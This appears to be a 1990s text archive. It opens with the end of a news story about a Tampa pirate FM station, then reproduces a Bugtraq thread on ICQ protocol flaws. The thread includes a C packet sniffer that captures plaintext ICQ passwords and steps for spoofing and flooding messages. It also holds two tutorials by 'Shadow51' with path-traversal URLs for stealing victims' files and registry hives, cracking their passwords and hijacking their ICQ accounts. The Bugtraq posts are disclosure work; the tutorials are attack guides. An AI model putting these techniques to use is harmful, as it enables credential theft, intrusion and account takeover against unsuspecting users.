Party Pirate in early 1996, when an anonymous tip led to a written
notice warning Mr. Brewer that the station "creates a definite danger
of interference to important radio communication and impedes the
orderly distribution and protection of the spectrum."  A few months
later, a licensed rock station in nearby Sarasota, WHFT, broadcasting
a hair's breadth away on the dial at 102.5, complained to the FCC that
Mr. Brewer's station was causing confusion among its listeners.
Fines and Seizures
   The FCC typically uses fines and equipment seizures to deal with
such situations.  The agency has threatened Mr. Brewer with both and
even issued a $1,000 fine, which has gone unpaid.  But Mr. Brewer has
stalled the enforcement process by engaging it head on.  Unlike most
pirates, he has applied for a legitimate license and has also sought
"special temporary authority" to remain on the air while his situation
is under review.  Both requests have been denied, but the maneuvering
has bought him time and kept the government from seizing his gear.
   Mr. Brewer has made a few guerilla moves to keep the FCC at bay.
When agents first appeared at his house in January 1996, he wasn't
home; he claims they badgered his wife and inpsected his station while
it was fully powered.  To make sure that doesn't happen again,
Mr. Brewer has installed a hidden switch in the laundry room that
allows his wife to power the station down from 125 watts to about 10
with a single flick if she sees the FCC prowling the neighborhood.
   This past Halloween, when FCC agents roamed the neighborhood
measuring the strength of the pirate station's signal, Mr. Brewer
caught them by surprise, driving up to them in a black van with his
radio station logo on the side.  Yelling "Smile!" he took the agents'
picture and posted it on his Internet site.
   There are signs the FCC is growing restless.  Ralph Barlow,
district director of the Tampa field office, won't discuss the
specifics of the case against the 43-year-old Mr. Brewer, but concedes
that the taunts are "not good" for his agents.  The matter is in the
hands of prosecutors in the U.S. attorney's office in Tampa, and the
FCC is pressing for action.  "This guy is going off the deep end
because he's been getting away with it for so long," Mr. Barlow says.
"Sooner or later I'll nail him."
   Those kinds of threats don't mean much to Mr. Brewer, who has
dabbled in electronics and rebellion for most of his life.  Thrown out
of a Tampa technical high school, he landed on his feet as phone
installer, and later as the operator of an electronics store.  In his
free time, he became immersed in the subcultures of ham radio, Harley
Davidsons and rock 'n' roll.
   A few years ago, he fought the local government here for the right
to erect a 150-foot ham tower over his home.  After winning,
Mr. Brewer took to lighting the tower like a huge Chirstmas tree each
holiday season.  To entertain crowds that drove by, he put up a tiny
FM transmitter and played Christmas music on an unused portion of the
band.  The signal carried only a few blocks.
   Growing ambitious, Mr. Brewer pumped up his operation in 1995,
broadcasting all day, every day, and adding wattage.  His harsh
programming didn't get much of a reaction at first.  "One of the big
mistakes I made was having eight straight hours of death metal," he
says.
   With the help of his wife, Karen, however, he built an operation
that resembles a real radio station, albeit a ragged one.  He has
advertisers of a sort, and receives promotional compact disks from
some record companies.  His black van can broadcast live from local
bars or businesses.
   Although the station's signal is clean, its programming swerves
from adventurous to amateurish.  On a recent night, a disk jockey
named Murph misidentified the performer of a song he played and was
taken to task by a listener.  Mr. Brewer himself goes on the air three
times a week, taking full advantage of the fact that, without a
license, he is beyond the reach of the FCC's restrictions on foul
language.  The sexual chitchat has earned Mr. Brewer a rising profile
and a bad-boy notoriety he treasures.  An alternative newspaper
recently crowned him "Best Pig of the Airwaves" in Tampa.
   Says 20-year-old listener Chas Goldman of Tampa: "I know it's not
really legal, but I don't know, man. . . . It's a really cool thing to
do."
   Advertisers on 102.1 FM range from strip clubs to record stores.
Mr. Brewer says they provide him with about $1,000 a month in
revenue.  For just $100 a month, he mentions their businesses several
times a day.  (He makes a living running an electronics store, which
makes some of its income selling FM transmitter kits on the Internet.)
Advertiser Scott Harris, owner of Disc-Go-Round, a used CD store,
says customers frequently mention the store's spots and tell him,
"We're glad you guys are on there because we believe in it."
   Such sentiments obviously aren't shared by licensed broadcasters.
Jeff Daumann, executive vice president and general counsel of the
National Association of Broadcasters, says his group's main concern is
that the FCC is slowly losing its ability to bring order to the radio
dial, and the group is also worried about interference with legitimate
stations.  "It's not a nuisance," Mr. Daumann says.  "It's a serious
problem."


                           ICQ so-called protocol

Description: The ICQ protocol is ridiculously simplistic and is riddled
with security holes. So is the ICQ software. So ICQ users can be spoofed,
have their machine crashed, or have evil haxxors run arbitrary code on
their boxes. Geez, these poor users might as well run Internet Explorer!
Author: Alan Cox <alan@CYMRU.NET>
Compromise: Spoof, Crash, or exploit the buffer overflow to run arbitrary
code
Vulnerable Systems: Mostly Windows boxes where the user is running ICQ
Date: 14 December 1997

Date: Sun, 14 Dec 1997 14:20:27 GMT

From: Alan Cox <alan@CYMRU.NET>

To: BUGTRAQ@NETSPACE.ORG

Subject: Vulnerabilities in ICQ

/*

This is a little toy to demo the weaknesses in Mirabilis ICQ system. There

are two major problems with the ICQ protocol clearly visible. As its an

unpublished proprietary system we can assume there may well be far more

lurking. Its also too apparent why they dont publish it - my guess has to

be "embarrasment factor"

The first flaw is plain dumb. They send plaintext authentication. Not only

that they send it once per session.

The second flaw is that they use easily guessable sequence numbers - starting

from 0 each user session, they use UDP and to make life even easier their

query service will tell you exactly what IP address to spoof as source when

faking them. So you can find someone is on, find their IP and spoof sequences

0->100 with a fair bet that somewhere before the 100th fake message you'll

get several hits and spoof messages. If not you can winnuke the victim so

he'll be back on a low sequence number 8)

Let us hope the proposed Rendezvous Protocol that is supposed to become

an internet draft is better designed and that the ICQ people switch to it.

There really is no excuse for using crude plaintext and simplistic sequence

spaces when five minutes thought could have resolved almost every weakness

except password change without US export controlled crypto.

I've enclosed a demo that does password sniffing for ICQ. It requires you

can work out how to set it up and it doesnt including spoofing code.

Alan



/*

 *      Snoop ICQ traffic for a set host. Shows how simplistic ICQ is and

 *      how easy it is to snoop it.

 */

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <signal.h>

#include <ctype.h>

#include <sys/socket.h>

#include <net/if.h>

#include <net/if_arp.h>

#include <netinet/in.h>

#include <linux/ip.h>

#include <linux/udp.h>

/*

 *      PUT THE IP ADDRESS OF THE CLIENT TO SNOOP HERE OR IT WONT WORK

 */

#define MY_CLIENT_TO_WATCH      0x7F000001

static int create_socket(void)

{

        int s=socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL));

        if(s==-1)

        {

                perror("socket");

                exit(1);

        }

        return s;

}

static void close_socket(int s)

{

        close(s);

}

static void promiscuous(int s, char *iface, int onoff)

{

        struct ifreq ifr;

        strcpy(ifr.ifr_name, iface);

        if(ioctl(s, SIOCGIFFLAGS, &ifr)==-1)

        {

                perror("SIOCGIFFLAGS");

                exit(1);

        }

        strcpy(ifr.ifr_name, iface);

        if(onoff)

                ifr.ifr_flags|=IFF_PROMISC;

        else

                ifr.ifr_flags&=~IFF_PROMISC;

        if(ioctl(s, SIOCSIFFLAGS, &ifr)==-1)

        {

                perror("SIOCSIFFLAGS");

                exit(1);

        }

}

static __inline__ ip_p(unsigned char *packet, int len)

{

        if(packet[12]==0x08 && packet[13]==0x00)

                return 1;

        return 0;

}

struct icqhdr

{

        unsigned char version[2] __attribute((packed)); /* ?? */

        unsigned short command __attribute((packed));

        unsigned short sequence __attribute((packed));

        unsigned long uid __attribute((packed));

        unsigned char data[0];

};

struct icqack

{

        unsigned char version[2] __attribute((packed)); /* ?? */

        unsigned short result __attribute((packed));

        unsigned short sequence __attribute((packed));

        unsigned char data[0];

};

struct icqstring

{

        unsigned short len;

        char data[0];

};

struct icqlogin

{

        struct icqhdr hdr __attribute((packed));

        unsigned long dunno __attribute((packed)); /* 000006FE.L */

        unsigned short pw_len __attribute((packed));

        unsigned char pw_data[11] __attribute((packed));

        struct in_addr addr __attribute((packed));

        /* Rest is a mystery right now */

        /* 0.L */

        /* 2.L */

        /* 0000004C, 00000000 */

        /* 00 78 */

};

static void print_icq_string(struct icqstring *s)

{

        fwrite(s->data, s->len-1, 1, stdout);

}

/*

 *      Scan a packet for clues

 */

static int process_packet(struct sockaddr *sa, unsigned char *packet, int len)

{

        int i;

        int lv;

        int d=0;

        static long num=0;

        struct iphdr *iph;

        struct udphdr *udphdr;

        if(strcmp(sa->sa_data,"eth0"))

                return 0;               /* Wrong port */

        if(!ip_p(packet, len))

                return 0;

        iph=(struct iphdr *)(packet+14);

        udphdr=(struct udphdr *)(iph+1);

        /* assume no options */

        lv=ntohs(udphdr->len);

        if( udphdr->source !=htons(4000) && udphdr->dest!=htons(4000))

        {

                return 0;

        }

/*      printf("packet %d   \r", ++num);*/

        if(iph->saddr==htonl(MY_CLIENT_TO_WATCH))

        {

                printf("To Server: %d bytes\n", lv);

        }

        else if(iph->daddr==htonl(MY_CLIENT_TO_WATCH))

        {

                printf("From Server: %d bytes\n", lv);

                d=1;

        }

        else return 0;

        i=14+sizeof(struct iphdr);

        if(len-i>lv)

                len=i+lv;

        i+=sizeof(struct udphdr);

/*      printf("UDP size %d\n",i);*/

        if(i>=sizeof(struct icqhdr)+sizeof(struct udphdr))

        {

                struct icqhdr *p=(struct icqhdr *)(udphdr+1);

                if(d==0)

                {

                        printf("From %ld\n",p->uid);

                        printf("Version: %d.%d\nCommand ",

                                p->version[1], p->version[0]);

                        switch(p->command)

                        {

                                case 0x000A:

                                        printf("Ack");

                                        break;

                                case 0x03E8:

                                {

                                        struct icqlogin *il=(struct icqlogin *)p;

                                        printf("Login Password ");

                                        print_icq_string((struct icqstring *)&il->pw_len);

                                        printf(" IP %s", inet_ntoa(il->addr));

                                        break;

                                }

#if 0

                                case 0x0x??

                                {

                                        struct in_addr v=*(struct in_addr *)p->data;

                                        printf("Ping %s", inet_ntoa(v));

                                        break;

                                }

#endif

                                case 0x409:

                                {

                                        printf("Ping");

                                        break;

                                }

                                case 0x0438:

                                {

                                        struct icqstring *s=(struct icqstring *)p->data;

                                        printf("Disconnect (");

                                        print_icq_string(s);

                                        printf(")");

                                        break;

                                }

                                case 0x0456:

                                {

                                        /* data +4,5 is always 0100 */

                                        struct icqstring *s=(struct icqstring *)(p->data+6);

                                        printf("Message to %ld  ", *((long *)p->data));

                                        print_icq_string(s);

                                        break;

                                }

                                case 0x0460:

                                {

                                        printf("Information %ld on ID %d",

                                                *((short *)p->data),

                                                *((long *)(p->data+2))

                                        );

                                        break;

                                }

                                case 0x046A:

                                {

                                        printf("Information_2 %ld on ID %d",

                                                *((short *)p->data),

                                                *((long *)(p->data+2))

                                        );

                                        break;

                                }

                                case 0x04D8:

                                {

                                        printf("Status ");

                                        switch(*((long *)p->data))

                                        {

                                                case 0x00:

                                                        printf("[Away 0]");

                                                        break;

                                                case 0x01:

                                                        printf("[Away 1]");

                                                        break;

                                                case 0x10:

                                                        printf("[DND 0]");

                                                        break;

                                                case 0x11:

                                                        printf("[DND 1]");

                                                        break;

                                                default:

                                                        printf("%04X",

                                                                *((long *)p->data));

                                        }

                                        break;

                                }

                                default:

                                        printf("%04X", p->command);

                        }

                        if(p->sequence)

                                printf("\nSequence %d\n",

                                        p->sequence);

                        else

                                printf("\n");

                }

        }

        if(i>=sizeof(struct icqack)+sizeof(struct udphdr))

        {

                struct icqack *p=(struct icqack *)(udphdr+1);

                if(d==1)

                {

                        printf("Version: %d.%d\nReply ",

                                p->version[1], p->version[0]);

                        switch(p->result)

                        {

                                case 0x000A:

                                        printf("Ack");

                                        break;

                                case 0x00E6:

                                        printf("Away Reply ");

                                        printf("for %ld",

                                                *((long *)p->data));

                                        break;

                                case 0x0118:

                                {

                                        struct icqstring *is;

                                        printf("InfoID %d\n",

                                                *((short *)p->data));

                                        printf("ICQ ID %ld\n",

                                                *((long *)p->data+2));

                                        is=(struct icqstring *)(p->data+6);

                                        printf("Nick ");

                                        print_icq_string(is);

                                        is=(struct icqstring *)(((char *)is)+is->len+2);

                                        printf("\nName ");

                                        print_icq_string(is);

                                        is=(struct icqstring *)(((char *)is)+is->len+2);

                                        printf(" ");

                                        print_icq_string(is);

                                        is=(struct icqstring *)(((char *)is)+is->len+2);

                                        printf("\nEMail ");

                                        print_icq_string(is);

                                        is=(struct icqstring *)(((char *)is)+is->len+2);

                                        printf("\nInfo ");

                                        print_icq_string(is);

                                        break;

                                }

                                default:

                                        printf("%04X", p->result);

                        }

                        if(p->sequence)

                                printf("\nSequence %d\n",

                                        p->sequence);

                        else

                                printf("\n");

                }

        }

        while(i<len)

        {

                int x;

                for(x=0; x<8 && i+x<len; x++)

                {

                        printf("%02X ", packet[i+x]);

                }

                printf("    ");

                for(x=0;x<8 && i+x<len; x++)

                {

                        unsigned char c=packet[i+x];

                        if(c>=32 && c< 127)

                                printf("%c", c);

                        else

                                printf(".");

                }

                printf("\n");

                i+=8;

        }

        printf("\n");

        fflush(stdout);

        return 0;

}

int main(int argc, char *argv[])

{

        int s;

        unsigned char buf[1600];

        struct sockaddr sa;

        int salen;

        int len;

        s=create_socket();

        promiscuous(s, "eth0", 1);

        while(1)

        {

                salen=sizeof(sa);

                if((len=recvfrom(s, (char *)buf, 1600, 0, &sa, &salen))==-1)

                {

                        perror("recvfrom");

                        close_socket(s);

                        exit(1);

                }

                process_packet(&sa, buf,len);

        }

        printf("An error has occured.\n");

        close_socket(s);

        exit(0);

}

Date: Sun, 14 Dec 1997 21:17:14 -0500

From: Seth McGann <smm@WPI.EDU>

To: BUGTRAQ@NETSPACE.ORG

Subject: Re: Vulnerabilities in ICQ

At 14:20 12/14/97 GMT, you wrote:

The Client-To-Client Protocol used by ICQ is even worse.  It does no

authentication of any kind and places all trust in the client.  Spoofing

messages  from arbitrary ICQ users is easy, as is sending file and chat

requests.  Even worse, if the client gets anything it doesn't expect it

crashes(!) sometimes taking Windows with it.  There is also no flood

protection and packet replay is possible.  A few thousand messages will

slow my P166 to a crawl.  The only good thing ICQ did was pick a different

port number for each session (well, not really its usually around 1024 as

windows seems to allocate port numbers in order.)  So, an attack would go

as follows:

1. Port scan the target IP looking form 1024-2000 or so.

2. Send some random data to crash it.  Using netcat is good for this. (or)

3. Take a valid ICQ message and resend it a million times. (or)

4. Take a valid ICQ message and change the User Identification Numbers. (or)

5. Be creative :)

To reverse engineer the protocol, simply study the results of different ICQ

activities with a sniffer or some type of Winsock watcher.  I have figured

out quite a bit about the protocol and will release a more formal writeup

soon.  Anyone with a few hours should be able to writeup a suitable client

message spoofer.  I am writing this as I have been exploiting these

vulnerablites for quite some time and I haven't seen anything about this on

usenet or the mailing lists.  As an example, I have provided the transcript

of a message.

This is an example of a simple message (there are many other types of

traffic) of "12345" from UIN 3399052:

>> 0000:   2D 00   <- Prefix (if this is wrong bad things happen)

>> 0000:   8C DD 33 00 02 00 EE 07   00 00 8C DD 33 00 01 00

>> 0010:   06 00 31 32 33 34 35 00   82 D7 F3 20 82 D7 F3 20

>> 0020:   09 04 00 00 04 00 00 10   01 ED FF FF FF

<< 0000:   28 00   <- Post fix and ACK

<< 0000:   5D 29 35 00 02 00 DA 07   00 00 5D 29 35 00 01 00

<< 0010:   01 00 00 82 D7 F3 25 82   D7 F3 25 22 07 00 00 04

<< 0020:   00 00 00 00 ED FF FF FF

Simply send this alot for a flood using netcat (ignoring the responses of

course).  I wrote a few simple exploits, but they used the socket faq

library and seem redundant at this point, so I leave exploitation as an

exercise to the reader.

Seth M. McGann / smm@wpi.edu        "Security is making it

http://www.wpi.edu/~smm              to the bathroom in time."

KeyID: 1024/2048/5FC59C0A

Fingerprint F315 1C37 CF3C 3612 3B28  BC84 C430 BC22 5FC5 9C0A

Date: Tue, 16 Dec 1997 20:20:41 -0300

From: Solar Designer <solar@FALSE.COM>

To: BUGTRAQ@NETSPACE.ORG

Subject: Re: Vulnerabilities in ICQ

Hello,

> The Client-To-Client Protocol used by ICQ is even worse.  It does no

> authentication of any kind and places all trust in the client.  Spoofing

> messages  from arbitrary ICQ users is easy, as is sending file and chat

> requests.  Even worse, if the client gets anything it doesn't expect it

> crashes(!) sometimes taking Windows with it.

Spoofing chat requests? Crashes?

00422D4D                 lea     ecx, [ebp-118h]

00422D53                 push    dword ptr [esi+18h]

00422D56                 push    offset aTheFollowingRe

00422D5B                 push    ecx

00422D5C                 call    ds:sprintf

...

004B58F8 aTheFollowingRe db 0Dh,0Ah              ; DATA XREF: _text:00422D56o

004B58F8                 db 'The following reason for a chat request was given: ',0Dh,0Ah

004B58F8                 db ' %s',0Dh,0Ah,0

Unless there's bound checking done before we get here, this overflow is

exploitable -- the buffer is on the stack. I'm too lazy to boot Windows

to check now.

Anyway, there're 100+ references to sprintf() and strcpy() in ICQ, at least

some of these have to be exploitable. IDA (the disassembler) is even able to

detect standard MSVC functions, so you get symbolic names for them right

after the disassembly, and can open a window with the cross references list.

Signed,

Solar Designer

Addendum(if any):
ICQ Homepage Exploit
By Shadow51


Ever wondered why there is a little house beside the name of some people? That doesn't mean they are at home, it means
they have the ICQ-Webserver running. The idiots who made it left huge bugs in it, like you can close their ICQ remotely,
and even download their files. The only problem is that you can't see the files, so you have to know what you're
downloading. 

To close the ICQ client: 

1. Click on the start button 
2. Click on RUN 
3. Type Telnet 123.123.123.123 80 Of course replace the 123.123.123.123 by the IP of the victim (note that this bug
only works on build 1700 and maybe a few others but I'm not sure). 
4. Press ENTER Wait until it connects 
5. Type QUIT Wait about 10 seconds. If they go offline that means it worked, if not, then it didn't work. Now suppose
you want to get some of their files. 

Lets say that you want to see the file c:\windows\win.ini, and he or she has the ICQ-Webserver on: 

1. Go to your browser 
2. Type http://123.123.123.123/.html/......../windows/win.ini 
note that you need the /.html/ part. It will trick the server into believing it's a html file, and note that there are 8 dots
/......../ (that means it goes back 4 dirs if the users ICQ dir is not in a standard place. It can cause problems, but 95% of
the time it's in c:\progra~1\icq\ 
3. press ENTER in your browser

It will simply ask you where you want to save the file the you save it and do what ever you want with it. Now this is not all
you can do. There are much better things with this exploit, like getting the user's password files and registry. If you are a
lamer, I suggest you go and play with what you just learned, and stop reading now cause this is a bit too complicated for
you :P. Okay, so you want to have the registry and all the passes. Okay, before you do this, I warn you that if the user
your hacking is not using the same version of Windows you are using, you could end up with a lot of problems. Suppose
you have Win98, and they have win95, and it wont work. An easy way to make sure it's the same version is to download
their command.com with the exploit, and compare the size with your command.com. There are many other ways, but this
is a good one. 

1. Get 2 files http://123.123.123.123/.html/......../windows/user.dat and
http://123.123.123.123/.html/......../windows/system.dat 
Remember to change the IP when your done. 
2. Copy them in a directory. 
3. Make a backup copy of you c:\windows\user.dat and c:\windows\system.dat You're gonna want to have them back
when you're done. 
4. Restart your computer 
5. Press F8 just before it boots up 
6. Choose "Command Prompt Only" 
7. Delete your current user.dat and system.dat and replace them with the ones from the guy you hacked 
8. Reboot your computer
9. Just before it boots, press F8 several times; choose safe mode.
10. Once booted in safe mode, click on start 
11. Click on RUN 
12. Type regedit
13. Press ENTER
14. Once in Regedit, click on the menu "Registry", then choose "Export Registry File..."
15. Save the file, then get yourself a Password Cracker
16. If all goes well, you now have all the users passwords.
It should look something like this:

crypt_Blizzard_Storm : A@N
www.mircosoft.com : Administration:PASSWORD


17. Reboot
18. Press F8 at startup
19. Choose "Command Prompt Only"
20. Replace user.dat and system.dat with your originals that you previously had backed up

Shadow51 
29000000 
Shadow51@writeme.com

-----------------------------------------------------------------------------------------------------------------------

ICQ Account Cracking
By Shadow51


A lot of people have been asking me how it would be possible to crack ICQ accounts. It's very easy, but unfortunately it
doesn't work every time. All you do is put in this: 
1. Download the following files from the targeted users hard drive using the ICQ exploit:
(replace 123.123.123.123 by the guys IP and UIN by the guys ICQ #)
(note that there's 6 dots not 8)

http://123.123.123.123/.html/....../db/UIN.idx
http://123.123.123.123/.html/....../db/UIN.dat
http://123.123.123.123/.html/....../db/UINmsg.dat
http://123.123.123.123/.html/....../db/UINmsg.idx
http://123.123.123.123/.html/....../db/UINhis.idx
http://123.123.123.123/.html/....../db/UINhis.dat

2. Open Notepad and create a new document.
3. Copy this into it. (Replace all the HACKEDUIN by the UIN you're hacking)
(I got this registry key from http://i.am/devil)

REGEDIT4

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN]
"Name"="Hacked UIN"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs]
"Random Groups Version"=dword:0000000a
"Online Color"=dword:00ff0000
"Unlisted Color"=dword:00800000
"Offline Color"=dword:000000ff
"Authorize Color"=dword:00400080
"Notify Color"=dword:00800080
"LastStatus Color"=dword:00008000
"Default File Dir"="C:\\Program Files\\ICQ\\Received Files"
"SMTP Address"=""
"DND Message"="Please do not disturb me now. Disturb me later."
"Out Message"=""
"Busy Message"="User is occupied. Only urgent messages will be delivered."
"Chat Message"="I would like to chat about anything"
"Away PreNum"=dword:00000000
"Out PreNum"=dword:00000000
"Busy PreNum"=dword:00000000
"DND PreNum"=dword:00000000
"Chat PreNum"=dword:00000000
"File Options"=dword:00000004
"URL Options"=dword:00000004
"Chat Options"=dword:00000004
"All Options"=dword:0000000e
"EXT Options"=dword:00000004
"Startup"="No"
"Auto Away"="No"
"Auto Hide Time"=dword:0000001e
"Auto Hide"="No"
"Move Server Top"="No"
"Blink In Tray"="No"
"Sort Lists"="Yes"
"Show Online List"="No"
"Remove AddFriend"="Yes"
"Splash Open"="Yes"
"History Last First"="Yes"
"FloatTop"="Yes"
"Thru Server"="No"
"Join Chat"="No"
"Open URL Browser"="No"
"Refuse File NotInList"="No"
"Overwrite ExistFile"="No"
"Disable Online Alert"="Yes"
"Accept Urgent In Busy"="No"
"Blink Tray In AwayBusy"="Yes"
"Use Contact List Color"="No"
"Contact List Color"=dword:00c8b99d
"Save User File"="Yes"
"Auto Update"="Yes"
"Search Wizard"="No"
"Default Mailer"="Yes"
"Pop Play Sound"="Yes"
"Pop Auto Launch"="No"
"Pop Check"="No"
"Pop Time"=dword:0000000a
"Check Headers"="Yes"
"MoveToOutDelay"=dword:00000014
"MoveToOut"="No"
"MoveToAwayDelay"=dword:0000000a
"MoveToAway"="No"
"Auto Sleep Mode"="No"
"Log History Events"="Yes"
"Connection Type"="Permanent"
"Firewall"="Yes"
"UseGivenIP"="No"
"Socks"="No"
"SocksPort"=dword:00000438
"SocksServer"="Enter your socks server"
"ProxySocks4Host"="Enter your proxy server"
"ProxySocks4Port"=dword:00000438
"UseProxySocks4"="No"
"GiveStats"="No"
"SocksVersion"=dword:00000004
"SocksAuthentication"=dword:00000000
"FirewallTimeout"=dword:0000001e
"UseFirewallTimeout"="No"
"UseFirewallRangePorts"="Yes"
"FirewallFromPort"=dword:000059d8
"FirewallToPort"=dword:00007148
"Old Sockets"="No"
"UserType"=dword:00000000
"Mail Receipients"=";"
"Random Available"="No"
"RandomGroupName"=dword:00000001
"Random Name"="#�d�� 666 �["
"Allow Secure Clients Only"="Yes"
"PhoneApproval"="Yes"
"PhoneToneTime"=dword:00000032
"PhonePauseTime"=dword:000001f4
"PhoneBreakTime"=dword:00000028
"PhoneSettings"=dword:00000001
"PhonePauseChar"=","
"PhoneLocalP"=" "
"PhoneLongP"=" "
"PhoneInterP"=" "
"Chat RoomName"="Product Support / Suggestion"
"Auto Join Chat Room"="Yes"
"Novice Counter"=dword:0000000a
"Menu Counter"=dword:00000013
"Servers Version"=dword:00000001
"Externals Version"=dword:00000019
"Stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"Novice"="No"
"Dropped Users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00
"State Flags"=dword:00000000
"Server Msg Version"=dword:0000000b
"Server Msg Shown"=dword:00000001
"Server Msg Count"=dword:00000009
"LeftButton Warning"="No"
"Menu Left Click"="No"
"Tip Startup"="No"
"Tip Position"=dword:00000000
"MoreEvents Warning"="No"
"Invisible Warning"="No"
"Send Later Warning Off"="No"
"Busy Warning"="No"
"Away Warning"="No"
"DND Warning"="No"
"FT Warning"="No"
"Ext Warning"="No"
"Out Warning"="No"
"Chat Warning"="No"
"Away Message"="User is currently away\r\nYou can leave him/her a message"
"Random Comment"="You won't be hurt by things you don't care.\r\n\r\n(c) Calvin's Labs, 1993-1998. No Rights
Reserved.\r\nIt's not a secret. It's not a magic. It's not a myth."

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\YOURUIN\Prefs\Presets]
"OutMsg Presets 0"="I'm out'a here. See you tomorrow!"
"DNDMsg Presets 0"="Please do not disturb me now. Disturb me later."
"Away PresetsMsg 0"="Away"
"Out PresetsMsg 0"="Out for the day"
"Busy PresetsMsg 0"="Busy"
"DND PresetsMsg 0"="DND"
"Chat PresetsMsg 0"="Chat"
"AwayMsg Presets 1"="I am out to lunch. I will return shortly."
"OutMsg Presets 1"=""
"DNDMsg Presets 1"="I am currently in a meeting. I can't be disturbed."
"ChatMsg Presets 1"="Come Join my chat room!"
"Away PresetsMsg 1"="Lunch"
"Out PresetsMsg 1"="Not here"
"Busy PresetsMsg 1"="Meeting"
"DND PresetsMsg 1"="Meeting"
"Chat PresetsMsg 1"="Come In"
"AwayMsg Presets 2"="Don't go anywhere! I'll be back in a jiffy!"
"OutMsg Presets 2"="I'm closed for the weekend/holidays."
"DNDMsg Presets 2"="Don't disturb my concentration!"
"ChatMsg Presets 2"="Don't miss out on the fun! Join our chat!"
"Away PresetsMsg 2"="Be right back"
"Out PresetsMsg 2"="Closed"
"Busy PresetsMsg 2"="Concentration"
"DND PresetsMsg 2"="Concentration"
"Chat PresetsMsg 2"="Fun"
"AwayMsg Presets 3"="I'm out with the dog. Be back when he's finished."
"OutMsg Presets 3"="Gone fishin'."
"DNDMsg Presets 3"="I'm on the phone with a very important client. Don't disturb me!"
"ChatMsg Presets 3"="What are you waiting for? Come on in!"
"Away PresetsMsg 3"="Dog Walk"
"Out PresetsMsg 3"="Fishing"
"Busy PresetsMsg 3"="On the Phone"
"DND PresetsMsg 3"="On the Phone"
"Chat PresetsMsg 3"="Don't Wait"
"AwayMsg Presets 4"="Went out for a smoke. "
"OutMsg Presets 4"="I'm sleeping. Don't wake me."
"DNDMsg Presets 4"="I can't chat with you now. I'm busy."
"ChatMsg Presets 4"="We'd love to hear what you have to say. Join our chat."
"Away PresetsMsg 4"="Smoke"
"Out PresetsMsg 4"="Sleeping"
"Busy PresetsMsg 4"="Can't chat "
"DND PresetsMsg 4"="Can't chat "
"Chat PresetsMsg 4"="Hear"
"AwayMsg Presets 5"="On my Coffee break."
"OutMsg Presets 5"="Went home. Had to feed the kids."
"DNDMsg Presets 5"="Can't you see I'm working?"
"ChatMsg Presets 5"="Enter your chat room message here"
"Away PresetsMsg 5"="Coffee"
"Out PresetsMsg 5"="Kids"
"Busy PresetsMsg 5"="Working"
"DND PresetsMsg 5"="Working"
"Chat PresetsMsg 5"="Empty"
"AwayMsg Presets 6"="Went to get some fresh air."
"OutMsg Presets 6"="Gone for good."
"DNDMsg Presets 6"="Enter your occupied message here"
"ChatMsg Presets 6"="Enter your chat room message here"
"Away PresetsMsg 6"="Air"
"Out PresetsMsg 6"="Gone"
"Busy PresetsMsg 6"="Conversing"
"DND PresetsMsg 6"="Empty"
"Chat PresetsMsg 6"="Empty"
"BusyMsg Presets 7"="User is occupied. Only urgent messages will be delivered."
"DNDMsg Presets 7"="Enter your occupied message here"
"ChatMsg Presets 7"="Enter your chat room message here"
"Away PresetsMsg 7"="Empty"
"Out PresetsMsg 7"="Empty"
"Busy PresetsMsg 7"="Empty"
"DND PresetsMsg 7"="Empty"
"Chat PresetsMsg 7"="Empty"
"BusyMsg Presets 0"="User is currently Occupied"
"ChatMsg Presets 0"="I would like to chat about anything"
"BusyMsg Presets 1"="User is currently Occupied1"
"BusyMsg Presets 2"="User is currently Occupied2"
"BusyMsg Presets 3"="User is currently Occupied"
"BusyMsg Presets 4"="User is currently Occupied"
"BusyMsg Presets 5"="User is currently Occupied"
"BusyMsg Presets 6"="User is currently Occupied"
"AwayMsg Presets 7"="User is currently away"
"OutMsg Presets 7"="User is currently N/A"
"AwayMsg Presets 0"="User is currently away\r\nYou can leave him/her a message"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD]

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message0]
"Message"="Please bookmark our network status page."
"URLName"="http://www.mirabilis.com/status.html"
"URL"="press here"
"Date"=""

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message1]
"URLName"="http://www.mirabilis.com/emailsig.html"
"URL"="Go to the ICQ e-mail signature generator"
"Date"=""

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message2]
"Message"="ICQ is doing it again! One more new service from ICQ for your pleasure! Create your ICQ interest group -
home, work, family, hobby, affiliation, sports, music...etc..( It's straight forward, no HTML needed! )"
"URLName"="http://www.icq.com/announcements/02.html"
"URL"="It's fun and easy, GO!!"
"Date"="31-MAR-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message3]
"URLName"="http://www.icq.com/announcements/whitepages.html"
"URL"="Go!"
"Date"="1-APR-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message4]
"Message"="ICQ can notify you when you receive an e-mail and show you the e-mail headers! Learn how to do it!"
"URLName"="http://www.mirabilis.com/email.html"
